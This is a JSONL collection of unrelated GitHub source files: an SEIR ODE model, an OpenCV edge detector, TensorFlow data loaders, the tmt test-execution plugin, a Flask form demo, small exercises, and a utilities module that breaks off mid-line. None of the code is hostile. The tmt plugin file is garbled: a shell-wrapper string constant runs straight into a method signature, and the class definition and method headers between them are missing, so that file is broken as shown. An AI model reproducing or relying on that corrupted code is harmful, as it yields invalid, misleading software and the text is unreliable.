{"seq_id":"11065051694","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\ndef dAdt(A, t, beta, gamma, N, v, alpha, eta):\n    # define the state variables.\n    S = A[0]\n    E = A[1]\n    I = A[2]\n    R = A[3]\n    D = A[4]\n    V = A[5]\n    return [\n        -beta/N * S * I - v*S,\n        beta/N * S * I - alpha * E,\n        alpha * E - gamma * I,\n        gamma * (1 - eta) * I,\n        gamma * eta * I,\n        v*S\n    ]\n\n# how long to simulate\ntimes = np.arange(0, 500, 1)\n\n# set the constant values\ngamma = 0.083\nN = 1e7\nbeta = 0.20\nv = 0.04\nalpha = 0.192\neta = 0.024\n\n# initial values of the variables\nS0, E0, I0, R0, D0, V0 = N-800, 800, 0, 0, 0, 0\n\n# solve the ODE.\nsol = odeint(dAdt, y0=[S0, E0, I0, R0, D0, V0],t=times, args=(beta, gamma, N, v, alpha, eta))\n\n# plot the results.\nS = sol.T[0]\nE = sol.T[1]\nI = sol.T[2]\nR = sol.T[3]\nD = sol.T[4]\nV = sol.T[5]\n\nplt.figure(facecolor='w',figsize=(30,10))\nplt.plot(times, S)\nplt.plot(times, E)\nplt.plot(times, I)\nplt.plot(times, R)\nplt.plot(times, D)\nplt.plot(times, V)\n\nplt.grid()\nplt.show()\n\n","repo_name":"jefersonseverino/MetodosNumericos","sub_path":"metodos.py","file_name":"metodos.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6461601061","text":"import numpy as np\nimport cv2\nimport os\n\ndef edge():\n    image = cv2.imread(os.path.join(\"input_imgs\", \"i.jpg\"))\n    # set the image path manually\n    hls = cv2.cvtColor(image, cv2.COLOR_BGR2HLS)\n    lower = np.array([0, 0, 0])\n    upper = np.array([255, 75, 255])\n\n    blackmask = cv2.inRange(hls, lower, upper)\n    kernel = np.ones((7, 7), np.uint8)\n    opening = cv2.morphologyEx(blackmask, cv2.MORPH_OPEN, kernel)\n\n    edges = cv2.Canny(opening, 150, 240, apertureSize=3)\n\n    cv2.imwrite(\"edges.jpg\", edges)\n    #cv2.imwrite('mask'+str(n+1)+\".jpeg\", blackmask)\n    minLineLength = 150\n    lines = cv2.HoughLinesP(edges, rho=1, theta=np.pi/180, threshold=100,\n                            lines=[], minLineLength=minLineLength, maxLineGap=20)\n\n    a, b, c = lines.shape\n    m = []\n    b = []\n    line_poly = []\n    poly = [0, 0, 
0]\n    right_lines = []\n    left_lines = []\n    # print(len(lines))\n    for i in range(len(lines)):\n        ang = (180/np.pi)*np.arctan((lines[i][0][3] -\n                                     lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))\n        poly = [(lines[i][0][3]-lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]), lines[i][0]\n                [1]-((lines[i][0][3]-lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))*lines[i][0][0], lines[i][0]]\n        line_poly.append(poly)\n    for i in range(len(line_poly)):\n        ang = (180/np.pi)*np.arctan((lines[i][0][3] -\n                                     lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))\n        if abs(ang) > 20 and abs(ang) < 80:\n            if line_poly[i][0] < 0:\n                left_lines.append(line_poly[i])\n            else:\n                right_lines.append(line_poly[i])\n\n    left_x = []\n    right_x = []\n    if len(left_lines) > 0:\n        for j in range(len(left_lines)):\n            left_x.append(560/left_lines[j][0] -\n                          left_lines[j][1]/left_lines[j][0])\n        x_main = max(left_x)\n        k = left_x.index(x_main)\n        left_average = left_lines[k]\n        rr = cv2.line(image, (left_average[2][0], left_average[2][1]), (\n            left_average[2][2], left_average[2][3]), (0, 0, 255), 3, cv2.LINE_AA)\n        cv2.imwrite(\"sssdd.jpg\", rr)\n    else:\n        left_average = []\n    if len(right_lines) > 0:\n        for k in range(len(right_lines)):\n            right_x.append(560/right_lines[k][0] -\n                           right_lines[k][1]/right_lines[k][0])\n        x_main = min(right_x)\n        k = right_x.index(x_main)\n        right_average = right_lines[k]\n        cv2.line(image, (right_average[2][0], right_average[2][1]), (\n            right_average[2][2], right_average[2][3]), (0, 0, 255), 3, cv2.LINE_AA)\n    else:\n        right_average = []\n    if left_average != [] and right_average != []:\n        fit_1 = [left_average[0], left_average[1]]\n        fit_2 = [right_average[0], right_average[1]]\n        return fit_1, fit_2, 1\n    if left_average == [] and right_average != []:\n        fit = [right_average[0], right_average[1]]\n        return [], fit, 2\n    if left_average != [] and right_average == []:\n        fit = [left_average[0], left_average[1]]\n        return fit, [], 3\n    if left_average == [] and right_average == []:\n        fit = []\n        return fit, [], 0\nedge()","repo_name":"roboime/HRR-Intel","sub_path":"hrr/tests/edge_detector.py","file_name":"edge_detector.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18692603176","text":"# -*- encoding: utf-8 -*-\n'''\n@Filename : check_hourly_format.py\n@Datetime : 2020/06/17 14:43:00\n@Author : Joe-Bu\n@version : 1.0\n'''\n\nimport os\nimport sys\n\nSTD_NUM=46\n\n\ndef parse_err_time(filename):\n    '''\n    Get the sites where errors occurred\n    '''\n    assert os.path.exists(filename)\n\n    with open(filename, 'r') as f:\n        cont = f.readlines()\n    err_time = [f.split('_')[-1].split('.')[0] for f in cont]\n    # print('\\n'.join(err_time))\n\n    return err_time\n\n\ndef main():\n    '''\n    Main\n    '''\n    err_file = r'./err_hour.txt'\n    parse_err_time(err_file)\n\n    \nif __name__ == \"__main__\":\n    main()","repo_name":"JoeBuzh/Pm_Composition_Quallity_Control","sub_path":"extract/getErrTime.py","file_name":"getErrTime.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36999694166","text":"import tensorflow as tf\nimport glob\n\nif tf.__version__.split(\".\",1)[0] == \"1\":\n    pass\nelse:\n    tf.truncated_normal_initializer=tf.compat.v1.truncated_normal_initializer\n    tf.feature_column.shared_embedding_columns=tf.feature_column.shared_embeddings\n    tf.feature_column.input_layer=tf.compat.v1.feature_column.input_layer\n    tf.losses.log_loss=tf.compat.v1.losses.log_loss\n    
tf.metrics.auc=tf.compat.v1.metrics.auc\n    tf.train.get_global_step=tf.compat.v1.train.get_global_step\n\n\ndef _batched_parse(serialized_examples,schema):\n    features=tf.io.parse_example(\n        serialized_examples,\n        features=schema\n    )\n    ctr=features.pop(\"finalClickFlag\")\n    cvr=features.pop(\"pay_flag\")\n    # ctr = tf.cast(features[\"finalClickFlag\"],tf.float32)\n    # cvr = tf.cast(features[\"pay_flag\"],tf.float32)\n    return features, {'ctr': ctr, 'cvr': cvr}\n\n\ndef loadtf(filenames,schema,batch_size=64,num_epochs=1):\n    #filenames=glob.glob(pattern)\n    seqlen=10\n    for key in schema.keys():\n        if \"list\" in key:\n            schema[key]=tf.io.FixedLenFeature([seqlen], tf.string,default_value=[\"-1\"]*seqlen)\n    ds=tf.data.TFRecordDataset(\n        filenames,\n        compression_type=None,\n        buffer_size=None,\n        num_parallel_reads=tf.data.AUTOTUNE,\n    )\n    ds=ds.repeat(num_epochs)\n    ds=ds.shuffle(buffer_size= 50 * batch_size)\n    ds=ds.batch(batch_size)\n    ds=ds.map(lambda x:_batched_parse(x,schema),num_parallel_calls=tf.data.AUTOTUNE)\n    ds=ds.prefetch(buffer_size=tf.data.AUTOTUNE)\n    return ds\n\n\nclass CSVDataSet():\n    def __init__(self,filelist,record_defaults,column_names,drop_columns=[],n_readers=4,num_parallel_calls=4,buffer_size=10240):\n        self.filename_dataset = tf.data.Dataset.list_files(filelist)\n        self.n_readers=n_readers\n        self.record_defaults=record_defaults\n        self.column_names=column_names\n        self.drop_columns=drop_columns\n        self.buffer_size=buffer_size\n        self.num_parallel_calls=num_parallel_calls\n\n    def getds(self,batch_size=1024,num_epochs=1):\n        dataset = self.filename_dataset.interleave(\n            lambda filename: tf.data.TextLineDataset(filename).skip(1).shuffle(self.buffer_size),\n            # read cycle_length files in parallel; by default one record is taken from each reader per step\n            cycle_length = self.n_readers\n        )\n        dataset = dataset.map(self.parse_csv, num_parallel_calls=self.num_parallel_calls)\n        return dataset\n\n    def parse_csv(self,value):\n        columns = tf.io.decode_csv(value, record_defaults=self.record_defaults)\n        features = dict(zip(self.column_names, columns))\n        for col in self.drop_columns :\n            features.pop(col)\n        # for col in self.sequental_columns:\n        #     features[col]=tf.strings.to_number(tf.strings.split(features[col], sep='|').values, out_type=tf.dtypes.int64)\n        ctr = features.pop('finalClickFlag')\n        cvr = features.pop('pay_flag')\n        ctr = tf.cast(tf.reshape(ctr, [1]),tf.float32)\n        cvr = tf.cast(tf.reshape(cvr, [1]),tf.float32)\n        return features, {'ctr': ctr, 'cvr': cvr}\n\n\ndef input_fn(file_list,column_names,record_defaults,drop_columns,num_epochs=1,batch_size=1024):\n    dsiter=CSVDataSet(file_list,record_defaults,column_names,drop_columns)\n    dataset=dsiter.getds()\n    dataset = dataset.repeat(num_epochs)\n    dataset=dataset.shuffle(buffer_size= 50 * batch_size)\n    dataset = dataset.batch(batch_size)\n    dataset=dataset.prefetch(buffer_size=tf.data.AUTOTUNE)\n    return dataset\n\n\nif __name__ == \"__main__\":\n    # schema=modelobj.feat_schema\n    # loadtf(\"data/train_tf/*.tf\",schema,batch_size=64)\n    pass","repo_name":"LiTugou/ljrec","sub_path":"utils/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16715410229","text":"import dataclasses\nimport json\nimport os\nimport sys\nimport time\nfrom typing import Any, Dict, List, Optional, cast\n\nimport click\n\nimport tmt\nimport tmt.options\nimport tmt.steps\nimport tmt.steps.execute\nimport tmt.utils\nfrom tmt.base import Test\nfrom tmt.result import Result, ResultOutcome\nfrom tmt.steps.execute import 
(SCRIPTS, TEST_OUTPUT_FILENAME,\n TMT_FILE_SUBMIT_SCRIPT, TMT_REBOOT_SCRIPT)\nfrom tmt.steps.provision import Guest\nfrom tmt.utils import EnvironmentType, Path, ShellScript\n\nTEST_WRAPPER_FILENAME = 'tmt-test-wrapper.sh'\n\nTEST_WRAPPER_INTERACTIVE = '{remote_command}'\nTEST_WRAPPER_NONINTERACTIVE = 'set -eo pipefail; {remote_command} Dict[str, Any]: # type: ignore[override]\n data = cast(Dict[str, Any], super().to_spec())\n data['script'] = [str(script) for script in self.script]\n\n return data\n\n def to_serialized(self) -> Dict[str, Any]:\n data = super().to_serialized()\n\n data['script'] = [str(script) for script in self.script]\n\n return data\n\n @classmethod\n def from_serialized(cls, serialized: Dict[str, Any]) -> 'ExecuteInternalData':\n \"\"\" Convert from a serialized form loaded from a file \"\"\"\n\n obj = super().from_serialized(serialized)\n obj.script = [ShellScript(script) for script in serialized['script']]\n\n return obj\n\n\n@tmt.steps.provides_method('tmt')\nclass ExecuteInternal(tmt.steps.execute.ExecutePlugin):\n \"\"\"\n Use the internal tmt executor to execute tests\n\n The internal tmt executor runs tests on the guest one by one, shows\n testing progress and supports interactive debugging as well. Test\n result is based on the script exit code (for shell tests) or the\n results file (for beakerlib tests).\n \"\"\"\n\n _data_class = ExecuteInternalData\n\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n self._previous_progress_message = \"\"\n self.scripts = SCRIPTS\n\n @classmethod\n def options(cls, how: Optional[str] = None) -> List[tmt.options.ClickOptionDecoratorType]:\n \"\"\" Prepare command line options for given method \"\"\"\n return [\n click.option(\n '-s', '--script', metavar='SCRIPT', multiple=True,\n help='Shell script to be executed as a test.'),\n # Interactive mode\n click.option(\n '-i', '--interactive', is_flag=True,\n help='Run in interactive mode, do not capture output.'),\n # Disable interactive progress bar\n click.option(\n '--no-progress-bar', is_flag=True,\n help='Disable interactive progress bar showing the current test.')\n ] + super().options(how)\n\n # TODO: consider switching to utils.updatable_message() - might need more\n # work, since use of _show_progress is split over several methods.\n def _show_progress(self, progress: str, test_name: str,\n finish: bool = False) -> None:\n \"\"\"\n Show an interactive progress bar in non-verbose mode.\n\n If the output is not an interactive terminal, or progress bar is\n disabled using an option, just output the message as info without\n utilising \\r. 
If finish is True, overwrite the previous progress bar.\n \"\"\"\n # Verbose mode outputs other information, using \\r to\n # create a status bar wouldn't work.\n if self.opt('verbose'):\n return\n\n # No progress if terminal not attached or explicitly disabled\n if not sys.stdout.isatty() or self.opt('no-progress-bar'):\n return\n\n # For debug mode show just an info message (unless finishing)\n message = f\"{test_name} [{progress}]\" if not finish else \"\"\n if self.opt('debug'):\n if not finish:\n self.info(message, shift=1)\n return\n\n # Show progress bar in an interactive shell.\n # We need to completely override the previous message, add\n # spaces if necessary.\n message = message.ljust(len(self._previous_progress_message))\n self._previous_progress_message = message\n message = self._indent('progress', message, color='cyan')\n sys.stdout.write(f\"\\r{message}\")\n if finish:\n # The progress has been overwritten, return back to the start\n sys.stdout.write(\"\\r\")\n self._previous_progress_message = \"\"\n sys.stdout.flush()\n\n def _test_environment(\n self,\n test: Test,\n extra_environment: Optional[EnvironmentType] = None) -> EnvironmentType:\n \"\"\" Return test environment \"\"\"\n\n extra_environment = extra_environment or {}\n\n data_directory = self.data_path(test, full=True, create=True)\n\n environment = extra_environment.copy()\n environment.update(test.environment)\n assert self.parent is not None\n assert isinstance(self.parent, tmt.steps.execute.Execute)\n\n environment[\"TMT_TEST_DATA\"] = str(data_directory / tmt.steps.execute.TEST_DATA)\n environment[\"TMT_REBOOT_REQUEST\"] = str(\n data_directory / tmt.steps.execute.TEST_DATA / TMT_REBOOT_SCRIPT.created_file)\n # Set all supported reboot variables\n for reboot_variable in TMT_REBOOT_SCRIPT.related_variables:\n environment[reboot_variable] = str(test._reboot_count)\n # Variables related to beakerlib tests\n if test.framework == 'beakerlib':\n environment['BEAKERLIB_DIR'] = str(data_directory)\n environment['BEAKERLIB_COMMAND_SUBMIT_LOG'] = (\n f\"bash {TMT_FILE_SUBMIT_SCRIPT.path}\")\n\n return environment\n\n def _test_output_logger(\n self,\n key: str,\n value: Optional[str] = None,\n color: Optional[str] = None,\n shift: int = 2,\n level: int = 3,\n err: bool = False) -> None:\n \"\"\" Custom logger for test output with shift 2 and level 3 defaults \"\"\"\n self.verbose(key=key, value=value, color=color, shift=shift, level=level, err=err)\n\n def execute(self, test: Test, guest: Guest,\n extra_environment: Optional[EnvironmentType] = None) -> None:\n \"\"\" Run test on the guest \"\"\"\n self.debug(f\"Execute '{test.name}' as a '{test.framework}' test.\")\n\n # Test will be executed in it's own directory, relative to the workdir\n assert self.discover.workdir is not None # narrow type\n assert test.path is not None # narrow type\n workdir = self.discover.workdir / test.path.unrooted()\n self.debug(f\"Use workdir '{workdir}'.\", level=3)\n\n # Create data directory, prepare test environment\n environment = self._test_environment(test, extra_environment)\n\n test_wrapper_filepath = workdir / TEST_WRAPPER_FILENAME\n\n # Prepare the test command (use default options for shell tests)\n if test.framework == \"shell\":\n test_command = ShellScript(f\"{tmt.utils.SHELL_OPTIONS}; {test.test}\")\n else:\n test_command = test.test\n self.debug('Test script', str(test_command), level=3)\n\n # Prepare the wrapper, push to guest\n self.write(test_wrapper_filepath, str(test_command), 'w')\n 
test_wrapper_filepath.chmod(0o755)\n guest.push(\n source=test_wrapper_filepath,\n destination=test_wrapper_filepath,\n options=[\"-s\", \"-p\", \"--chmod=755\"])\n\n # Prepare the actual remote command\n remote_command = ShellScript(f'./{TEST_WRAPPER_FILENAME}')\n if self.get('interactive'):\n remote_command = ShellScript(\n TEST_WRAPPER_INTERACTIVE.format(\n remote_command=remote_command))\n else:\n remote_command = ShellScript(\n TEST_WRAPPER_NONINTERACTIVE.format(\n remote_command=remote_command))\n\n # Execute the test, save the output and return code\n start = time.time()\n try:\n stdout, _ = guest.execute(\n remote_command,\n cwd=workdir,\n env=environment,\n join=True,\n interactive=self.get('interactive'),\n log=self._test_output_logger,\n timeout=tmt.utils.duration_to_seconds(test.duration),\n test_session=True,\n friendly_command=str(test.test))\n test.returncode = 0\n except tmt.utils.RunError as error:\n stdout = error.stdout\n test.returncode = error.returncode\n if test.returncode == tmt.utils.PROCESS_TIMEOUT:\n self.debug(f\"Test duration '{test.duration}' exceeded.\")\n end = time.time()\n self.write(\n self.data_path(test, TEST_OUTPUT_FILENAME, full=True),\n stdout or '', mode='a', level=3)\n test.real_duration = self.test_duration(start, end)\n\n def check(self, test: Test) -> List[Result]:\n \"\"\" Check the test result \"\"\"\n self.debug(f\"Check result of '{test.name}'.\")\n if test.result == 'custom':\n return self.check_custom_results(test)\n if test.framework == 'beakerlib':\n return self.check_beakerlib(test)\n else:\n try:\n return self.check_result_file(test)\n except tmt.utils.FileError:\n return self.check_shell(test)\n\n def _will_reboot(self, test: Test) -> bool:\n \"\"\" True if reboot is requested \"\"\"\n return self._reboot_request_path(test).exists()\n\n def _reboot_request_path(self, test: Test) -> Path:\n \"\"\" Return reboot_request \"\"\"\n return self.data_path(test, full=True) \\\n / tmt.steps.execute.TEST_DATA \\\n / TMT_REBOOT_SCRIPT.created_file\n\n def _handle_reboot(self, test: Test, guest: Guest) -> bool:\n \"\"\"\n Reboot the guest if the test requested it.\n\n Check for presence of a file signalling reboot request\n and orchestrate the reboot if it was requested. Also increment\n REBOOTCOUNT variable, reset it to 0 if no reboot was requested\n (going forward to the next test). 
Return whether reboot was done.\n \"\"\"\n if self._will_reboot(test):\n test._reboot_count += 1\n self.debug(f\"Reboot during test '{test}' \"\n f\"with reboot count {test._reboot_count}.\")\n reboot_request_path = self._reboot_request_path(test)\n test_data = self.data_path(test, full=True) / tmt.steps.execute.TEST_DATA\n with open(reboot_request_path, 'r') as reboot_file:\n reboot_data = json.loads(reboot_file.read())\n reboot_command = None\n if reboot_data.get('command'):\n try:\n reboot_command = ShellScript(reboot_data.get('command'))\n except TypeError:\n pass\n try:\n timeout = int(reboot_data.get('timeout'))\n except ValueError:\n timeout = None\n # Reset the file\n os.remove(reboot_request_path)\n guest.push(test_data)\n rebooted = False\n try:\n rebooted = guest.reboot(command=reboot_command, timeout=timeout)\n except tmt.utils.RunError:\n self.fail(\n f\"Failed to reboot guest using the \"\n f\"custom command '{reboot_command}'.\")\n raise\n except tmt.utils.ProvisionError:\n self.warn(\n \"Guest does not support soft reboot, \"\n \"trying hard reboot.\")\n rebooted = guest.reboot(hard=True, timeout=timeout)\n if not rebooted:\n raise tmt.utils.RebootTimeoutError(\"Reboot timed out.\")\n return True\n return False\n\n def go(\n self,\n *,\n guest: 'Guest',\n environment: Optional[tmt.utils.EnvironmentType] = None,\n logger: tmt.log.Logger) -> None:\n \"\"\" Execute available tests \"\"\"\n super().go(guest=guest, environment=environment, logger=logger)\n self._results: List[Result] = []\n\n # Nothing to do in dry mode\n if self.opt('dry'):\n self._results = []\n return\n\n self._run_tests(guest)\n\n def _run_tests(\n self,\n guest: Guest,\n extra_environment: Optional[EnvironmentType] = None) -> None:\n \"\"\" Execute tests on provided guest \"\"\"\n\n # Prepare tests and helper scripts, check options\n tests = self.prepare_tests()\n exit_first = self.get('exit-first', default=False)\n\n # Prepare scripts, except localhost guest\n if not guest.localhost:\n self.prepare_scripts(guest)\n\n # Push workdir to guest and execute tests\n guest.push()\n # We cannot use enumerate here due to continue in the code\n index = 0\n while index < len(tests):\n test = tests[index]\n\n progress = f\"{index + 1}/{len(tests)}\"\n self._show_progress(progress, test.name)\n self.verbose(\n 'test', test.summary or test.name, color='cyan', shift=1, level=2)\n\n self.execute(test, guest, extra_environment=extra_environment)\n\n # Pull test logs from the guest, exclude beakerlib backups\n if test.framework == \"beakerlib\":\n exclude = [\n \"--exclude\",\n str(self.data_path(test, \"backup*\", full=True))]\n else:\n exclude = None\n guest.pull(\n source=self.data_path(test, full=True),\n extend_options=exclude)\n\n results = self.check(test) # Produce list of results\n assert test.real_duration is not None # narrow type\n duration = click.style(test.real_duration, fg='cyan')\n shift = 1 if self.opt('verbose') < 2 else 2\n\n # Handle reboot, abort, exit-first\n if self._will_reboot(test):\n # Output before the reboot\n self.verbose(\n f\"{duration} {test.name} [{progress}]\", shift=shift)\n try:\n if self._handle_reboot(test, guest):\n continue\n except tmt.utils.RebootTimeoutError:\n for result in results:\n result.result = ResultOutcome.ERROR\n result.note = 'reboot timeout'\n abort = self.check_abort_file(test)\n if abort:\n for result in results:\n # In case of aborted all results in list will be aborted\n result.note = 'aborted'\n self._results.extend(results)\n for result in results:\n # If test 
duration information is missing, print 8 spaces to keep indentation\n                duration = click.style(result.duration, fg='cyan') if result.duration else 8 * ' '\n                self.verbose(f\"{duration} {result.show()} [{progress}]\", shift=shift)\n                if (abort or exit_first and\n                        result.result not in (ResultOutcome.PASS, ResultOutcome.INFO)):\n                    # Clear the progress bar before outputting\n                    self._show_progress('', '', True)\n                    what_happened = \"aborted\" if abort else \"failed\"\n                    self.warn(\n                        f'Test {test.name} {what_happened}, stopping execution.')\n                    break\n            index += 1\n\n            # Log into the guest after each executed test if \"login\n            # --test\" option is provided\n            if self._login_after_test:\n                assert test.path is not None  # narrow type\n                if self.discover.workdir is None:\n                    cwd = test.path.unrooted()\n                else:\n                    cwd = self.discover.workdir / test.path.unrooted()\n                self._login_after_test.after_test(\n                    result,\n                    cwd=cwd,\n                    env=self._test_environment(test, extra_environment),\n                    )\n        # Overwrite the progress bar, the test data is irrelevant\n        self._show_progress('', '', True)\n\n        # Pull artifacts created in the plan data directory\n        self.debug(\"Pull the plan data directory.\", level=2)\n        guest.pull(source=self.step.plan.data_directory)\n\n    def results(self) -> List[Result]:\n        \"\"\" Return test results \"\"\"\n        return self._results\n\n    def requires(self) -> List[str]:\n        \"\"\" Return list of required packages \"\"\"\n        return []\n","repo_name":"danmyway/tmt","sub_path":"tmt/steps/execute/internal.py","file_name":"internal.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"29960550673","text":"import sys\n\nN = int(sys.stdin.readline())\n\nstack = []\nfor _ in range(N):\n    order = sys.stdin.readline()\n    if order[:2] == \"pu\":  # push\n        o, v = order.split()\n        stack.append(int(v))\n    elif order[:2] == \"po\":  # pop\n        if len(stack) == 0:\n            print(-1)\n        else:\n            print(stack.pop())\n    elif order[:2] == \"si\":  # size\n        print(len(stack))\n    elif order[:2] == \"em\":  # empty\n        if len(stack) == 0:\n            print(1)\n        else:\n            print(0)\n    elif order[:2] == \"to\":  #top\n        if len(stack) == 0:\n            print(-1)\n        else:\n            print(stack[-1])","repo_name":"GDSC-SCH/Algorithm-Study","sub_path":"04_이남준/week_04/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"31635045993","text":"from flask import Flask, render_template, request, redirect, url_for\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField\nfrom wtforms.validators import DataRequired, ValidationError  # validation helpers\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'hello flask'\n\n\nclass Name_Form(FlaskForm):\n    name = StringField(\"What's your name\", validators=[DataRequired(message=u'内容不能不为空')],\n                       # label='请输入用户名',\n                       render_kw={\n                           \"required oninvalid\": \"setCustomValidity('请输入账号')\",\n                           \"class\": \"control-label col\",\n                           \"placeholder\": \"请输入你的名字\",\n                           \"oninput\": \" setCustomValidity('')\"\n                       })\n    submit = SubmitField('Submit',\n                         render_kw={\n                             \"class\": \"btn btn-default\"\n                         })\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    form_tables = Name_Form()  # instantiate the form\n    if form_tables.validate_on_submit():  # check whether the form was submitted\n        data = form_tables.name.data  # read form_tables.name.data\n\n        print(data)\n    return render_template('hello.html', form=form_tables)\n\n\nif __name__ == '__main__':\n    
app.run(port=8991)\n","repo_name":"Quan3Xin/helloFlask","sub_path":"hello_flask.py","file_name":"hello_flask.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"26331789000","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nfrom lascaux.router import Router\nfrom lascaux.execpath import Execpath\n\n\nclass RegexRouter(Router):\n\n    def find_execpath(self, reqres):\n        plugins = self.app.manager.get_subsystem('plugin').get_plugins()\n        for plugin in plugins:\n            for route in plugin.config['routes']:\n                exec_path = self.check_match(reqres, route, plugin)\n                if exec_path:\n                    return exec_path\n        return None\n\n    def check_match(self, reqres, route, plugin):\n        regex = plugin.config['routes'][route]['regex']\n        match = re.match(regex, reqres.uri)\n        if match:\n            return Execpath(reqres, plugin, route, \n                plugin.controllers[plugin.config['routes'][route]['controller']],\n                match.groupdict())\n        return False\n","repo_name":"hyphyphyph/lascaux","sub_path":"lascaux/routers/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"42796057745","text":"from random import *\nfrom math import *\ndef gera_vetor(x): # \"x\" is the dimension of the vector.\n    x = int(x)\n    i = 0\n    vetor=[0]*x\n    inter = randint(1,(10*x))\n    while i < len(vetor):\n        vetor[i] = randint(-inter,inter)\n        i = i + 1\n    return vetor\n\ndef max_lista(L):\n    t = 0\n    maximo = L[0]\n    while t < len(L):\n        if maximo <= L[t]:\n            maximo = L[t]\n        t = t + 1\n    return maximo\n\ndef encontra_maximo(M):\n    t = 0\n    Max = max_lista(M[0])\n    while t < len(M):\n        if Max <= max_lista(M[t]):\n            Max = max_lista(M[t])\n        t += 1\n    return Max","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_175/ch6_2019_04_05_07_52_52_442509.py","file_name":"ch6_2019_04_05_07_52_52_442509.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16431577568","text":"import json\nimport math\nimport re\nfrom copy import deepcopy\nfrom string_util import *\nimport config as config\nfrom lists import Lists\n\ndef itself(x):\n    return x\n\ndef transpose(t):\n    u = []\n    for i in range(0, len(t[1])):\n        u.append([])\n        for j in range(0, len(t)):\n            u[i].append(t[j][i])\n    return u \n\n\ndef dofile(sFile):\n    with open(sFile, 'r', encoding = 'utf-8') as f:\n        content = f.read()\n    content = re.findall(r'(return\\s+[^.]+)', content)[0]\n    map = {'return ' : '', '{' : '[', '}' : ']','=':':', '[\\n':'{\\n', '\\n]':'\\n}', '_':'\"_\"', '\\'':'\"'}\n    for k,v in map.items():\n        content = content.replace(k, v)\n    content = re.sub(\"(\\w+):\",r'\"\\1\":',content)\n    parsed_json = json.loads(content)\n    return parsed_json\n\ndef repPlace(data):\n    n,g = 20,{}\n    for i in range(1, n+1):\n        g[i]={}\n        for j in range(1, n+1):\n            g[i][j]=' '\n    maxy = 0\n    print('')\n    for r,row in enumerate(data.rows):\n        c = chr(97+r).upper()\n        print(c, row.cells[-1])\n        x,y= row.x*n//1, row.y*n//1\n        maxy = int(max(maxy,y+1))\n        g[y+1][x+1] = c\n    print('')\n    for y in range(1,maxy+1):\n        print(' '.join(g[y].values()))\n\n\ndef last(t):\n    return t[-1]\n\ndef rint(lo,hi):\n    return math.floor(0.5 + rand(lo, hi))\n\ndef any(t):\n    return t[rint(0, len(t))-1]\n\ndef rnd(n, nPlaces = 3):\n    mult = 10**nPlaces\n    return math.floor(n * mult + 0.5) / mult\n\ndef rand(lo, hi, mSeed = None):\n    lo, hi = lo or 0, hi or 1\n    Seed = 
config.Seed\n Seed = 1 if mSeed else (16807 * Seed) % 2147483647\n return lo + (hi-lo) * Seed / 2147483647\ndef many(t,n):\n u=[]\n for _ in range(1,n+1):\n u.append(any(t))\n return u\ndef cliffsDelta(ns1,ns2):\n if len(ns1) > 256:\n ns1 = many(ns1,256)\n if len(ns2) > 256:\n ns2 = many(ns2,256)\n if len(ns1) > 10*len(ns2):\n ns1 = many(ns1,10*len(ns2))\n if len(ns2) > 10*len(ns1):\n ns2 = many(ns2,10*len(ns1))\n n,gt,lt = 0,0,0\n for x in ns1:\n for y in ns2:\n n = n + 1\n if x > y:\n gt = gt + 1\n if x < y:\n lt = lt + 1\n return abs(lt - gt)/n > config.the['cliffs']\n\ndef diffs(nums1, nums2):\n def kap(nums, fn):\n return [fn(k, v) for k, v in enumerate(nums)]\n return kap(nums1, lambda k, nums: (cliffsDelta(nums.col.has, nums2[k].col.has), nums.col.txt))\n\ndef value(has,nB = None, nR = None, sGoal = None):\n sGoal,nB,nR = sGoal or True, nB or 1, nR or 1\n b,r = 0,0\n for x,n in has.items():\n if x==sGoal:\n b = b + n\n else:\n r = r + n\n b,r = b/(nB+1/float(\"inf\")), r/(nR+1/float(\"inf\"))\n return b**2/(b+r)\n\ndef showTree(node, what, cols, nPlaces, lvl = 0):\n if node:\n print('|.. ' * lvl + '[' + str(len(node['data'].rows)) + ']' + ' ', end = '')\n if not node.get('left') or lvl==0:\n print(node['data'].stats(\"mid\",node['data'].cols.y,nPlaces))\n else:\n print('')\n showTree(node.get('left'), what,cols, nPlaces, lvl+1)\n showTree(node.get('right'), what,cols,nPlaces, lvl+1)\ndef dkap(t, fun):\n u = {}\n for k,v in t.items():\n if(k and v is not None):\n v, k = fun(k,v) \n u[k or len(u)] = v\n return u\n\ndef firstN(sorted_ranges, scoreFun):\n print()\n for r in sorted_ranges:\n print(r['range']['txt'], r['range']['lo'], r['range']['hi'], rnd(r['val']), dict(r['range']['y'].has))\n first = sorted_ranges[0]['val']\n\n def useful(range):\n if range['val'] > 0.05 and range['val'] > first / 10:\n return range\n sorted_ranges = [s for s in 